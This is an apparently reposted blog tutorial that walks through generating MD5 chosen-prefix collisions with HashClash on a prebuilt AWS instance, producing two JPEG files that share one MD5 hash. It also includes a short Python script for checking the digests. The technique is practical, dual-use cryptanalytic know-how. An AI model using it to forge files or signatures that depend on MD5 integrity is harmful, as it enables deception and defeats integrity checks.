    A while ago a lot of people (~90,000) visited my site for a post about how easy it is to make two images with the same MD5 by using a chosen-prefix collision. I used Marc Stevens' HashClash on AWS and estimated the cost at around $0.65 per collision. Given the level of interest, I expected to see cool MD5 collisions popping up all over the place. Possibly it was enough for most people to know it can be done quite easily and cheaply, but I may also have missed out enough details in my original post. In this further post I've made an AWS image available and created a step-by-step guide so that you too can create MD5 chosen-prefix collisions and amuse your friends (disclaimer: they may not be that amused). All you need to do is create an AWS instance and run a few commands from the command line. There is an explanation of how the chosen-prefix collision works in Marc Stevens' Master's thesis.

    Here are the steps to create a collision.

    1) Log on to the AWS console and create a spot request for an instance based on my public Amazon Machine Image (AMI). Spot requests are much cheaper than creating instances directly, typically $0.065 an hour. They can be destroyed, losing your data, if the price spikes, but for fun projects they are the way to go. I have created a public AMI called hash-clash-demo. It has the id ami-dc93d3b4 and is in the US East (North Virginia) region. It has all the software necessary to create a collision pre-built. Search for it with ami-dc93d3b4 in community AMIs and then choose a GPU2 instance. I promise it does not mine bitcoins in the background, although thinking about it this would be a good scam and I may introduce this functionality.

    2) Once your request has been created and evaluated, hopefully you will have a running instance to connect to via SSH. You may need to create a new key pair; follow the instructions on AWS to do this and install it on your local machine.
    Once you have your key installed, log onto the instance via ssh as ec2-user.

    3) The shell script for running HashClash is located at /home/ec2-user/hashclash/src/scripts. Change into that directory and download some data to create a collision. Here I download a couple of jpeg images from tumblr.

    4) It is best to run the shell script in a screen session so you can detach from it and do other stuff. Start a screen session by typing screen. Once you are in the screen session, kick off the cpc.sh shell script with your two files. Send the output to a log file; in this case I called it demo.output. Detach from the screen session with Ctrl A + D.

    5) Tailing the log file, you should be able to see the start of the birthday attack, which gets the hash differences into the correct locations:

    tail -f demo.output

    6) Leave the birthday search to do its thing for an hour or so. Hopefully when you come back the attack will have moved on to the next stage: creating the near-collision blocks that gradually reduce the hash differences. The best way to check this is to look at the files created. The workdir0 directory contains all the data for the current collision search for the first near-collision block. More of these will be created as more near-collision blocks are generated.

    7) Go away again; a watched collision pretty much never happens. Check back in ~5 hours that it is still going on. Tailing demo.output and listing the directory should let you know roughly what stage the attack is at. Here we are only at block number 2 of probably 9.

    8) Come back again about 10-12 hours from the start, and with any luck we have a collision. This one finished at 02:45 in the morning, having been started at 10:30 the previous morning. You can tell when it finished, as that was the last point the log was written to. If the log file is still being updated, the collision search is still going on. It took 9 near-collision blocks to finally eliminate all the differences, which is normal. 16 hours is a bit longer than average.
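    As an aside (not from the original post), the final md5sum comparison can also be scripted with Python's hashlib. The md5_hex helper below is hypothetical, and it is demonstrated on a known test vector since the collision files themselves are not reproduced here:

```python
import hashlib

def md5_hex(path_or_bytes):
    """Return the hex MD5 digest of a byte string or of a file on disk."""
    if isinstance(path_or_bytes, bytes):
        data = path_or_bytes
    else:
        with open(path_or_bytes, "rb") as f:
            data = f.read()
    return hashlib.md5(data).hexdigest()

# With the two .coll files produced by the run, these lines should print
# the same digest twice:
#   print(md5_hex("plane.jpg.coll"))
#   print(md5_hex("ship.jpg.coll"))

# Known test vector:
print(md5_hex(b"hello"))  # 5d41402abc4b2a76b9719d911017c592
```
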
    The collisions have been created in files named plane.jpg.coll and ship.jpg.coll. You can verify that they do indeed have the same MD5 hash with md5sum. Here are the images with the collision blocks added. I downloaded them to my local machine with scp.

    Posted by Nathaniel McHugh at 2:01 PM

    Sursa: http://natmchugh.blogspot.co.uk/2015/02/create-your-own-md5-collisions.html
  24. NSA: https://twitter.com/NSA_PR/status/567554102284935169